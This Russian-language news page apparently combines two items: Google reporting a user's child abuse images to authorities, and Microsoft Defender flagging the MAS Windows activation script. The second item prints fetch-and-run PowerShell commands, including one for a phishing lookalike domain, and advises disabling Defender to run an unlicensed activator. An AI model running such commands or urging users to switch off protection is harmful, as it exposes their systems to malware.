Google сдал полиции пользователя с детским порно в электронной почте

Google сдал полиции пользователя с детским порно в электронной почте

Джон Генри Скиллерн (John Henry Skillern) из Хьюстона был арестован после того, как Google обнаружил в его переписке три изображения, относящихся к категории «детская порнография», и сообщил об этом в Национальный центр по делам пропавших и эксплуатируемых детей (National Center for Missing and Exploited Children). Полиция получила ордер на обыск и нашла больше доказательств того, что 41-летний американец причастен к совершению преступления.

Ранее Скиллерн уже был осужден за сексуальное нападение на 8-летнего мальчика в 1994 году.

Он пытался не попасться, пытался держать всё в электронной почте. Я не могу увидеть эту информацию, я не могу видеть, что на фото, зато Google может, пишет tjournal.ru.


Детектив Дэвид Неттлс

Арест Скиллерна повлёк за собой возобновление дискуссии о том, до какой степени личные приватные данные должны быть доступны для сервиса, при помощи которого они передаются.

Компания Google никогда не скрывала, что содержимое электронной почты сканируется. Правила сервиса были обновлены в апреле 2014 года, в них внесено уточнение, что анализ содержимого переписки пользователей проводится в автоматизированном режиме.

Тем не менее, одним из наиболее острых остаётся вопрос о точности распознания запретного контента. В этой связи CNet напомнил о недавнем случае с ошибочной блокировкой Instagram матери четверых детей, опубликовавшей фото полуодетой маленькой дочери и едва не лишившейся всего фотоблога.

Представитель Google комментировать ситуацию с арестом Скиллерна отказался.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru